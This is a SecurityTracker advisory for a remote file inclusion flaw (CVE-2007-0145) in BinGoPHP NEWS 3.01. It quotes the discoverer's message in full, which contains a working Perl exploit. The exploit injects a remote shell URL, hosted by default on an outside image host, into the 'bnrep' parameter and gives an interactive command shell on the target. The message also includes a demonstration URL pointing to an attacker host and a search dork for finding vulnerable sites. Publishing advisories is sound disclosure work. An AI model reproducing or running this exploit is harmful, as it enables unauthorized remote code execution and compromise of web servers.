BinGoPHP NEWS Include File Bug in 'bn_smrep1.php' Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1017477
|
|
SecurityTracker URL: http://securitytracker.com/id?1017477
|
|
CVE Reference: CVE-2007-0145
(Links to External Site)
|
Updated: May 20 2008
|
Original Entry Date: Jan 8 2007
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 3.01
|
Description: psych0 reported a vulnerability in BinGoPHP NEWS. A remote user can include and execute arbitrary code on the target system.
The 'bn_smrep1.php' script does not properly validate user-supplied input in the 'bnrep' parameter. A remote user can supply a specially
crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including
operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/BPNEWS/bn_smrep1.php?bnr
ep=http://attacker/bo3o?&
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: bingophp.free.fr/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: ". ." <psych0x96@gmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 7 Jan 2007 13:09:30 +0000
From: ". ." <psych0x96@gmail.com>
Subject: BinGoPHP News 3.01 (bnrep) Remote File Inclusion
|
#!/usr/bin/perl
#
# BinGoPHP News 3.01 (bnrep) Remote File Inclusion
# Script: BP News Version v3.01
# Website: http://bpdesign.infoliens.com/bphp/
# dl: http://bingophp.free.fr/BinGoPHPnewslast_full.zip
# Discovered by: psych0 - psych0x96 gmail com
# greetzz simo64
# *********
# vulnerable code in BPNEWS/bn_smrep1.php
# 2. include "$bnrep"."bn_configs.php";
# PoC:
# http://target/BPNEWS/bn_smrep1.php?bnrep=http://attacker/bo3o?&
# dork: "Script realise par BinGo PHP"
######################################################
#
# perl bpnews.pl http://www.tarjet.ma
#
# =====================================================
# = BP News 3.01 (bnrep) Remote Command Execution =
# =====================================================
#
# shell |$ id
# uid=80(www) gid=80(www) groups=80(www)
# shell |$ exit
#
# Enjoy !
#
use LWP::Simple;
print"
=====================================================
= BP News 3.01 (bnrep) Remote Command Execution =
=====================================================
\n";
my $targ,$rsh,$path,$con,$cmd,$data,$getit ;
$targ = $ARGV[0];
$rsh = $ARGV[1];
if(!$ARGV[1]) {$rsh = "http://img15.imgspot.com/u/07/5/21/walou1168136692.jpg";}
if(!@ARGV) { &usage;exit(0);}
$targ = $ARGV[0];
chomp($targ);
chomp($rsh);
$path = $targ."/BPNEWS/bn_smrep1.php";
$con = get($path) || die "[-]Cannot connect to Host";
sub usage(){
print "Usage : perl $0 host/path [OPTION]\n\n";
print "Ex : perl $0 http://www.target.com\n";
print " perl $0 http://www.target.com http://yoursite/yourcmd.txt\n\n";
}
while ()
{
print "shell |\$ ";
chomp($cmd=<STDIN>);
if ($cmd eq "exit") { print "\nEnjoy !\n\n";exit(0);}
$getit = $path."?bnrep=".$rsh."?&cmd=".$cmd;
$data=get($getit);
if($cmd eq ""){ print "Please enter command !\n"; }
else{ print $data ;}
}
#@moumou is baaaaaackkkkk
#(c) mouradmix@hotmail.com hehe:p~
#...
#**happy 3id**
|
|
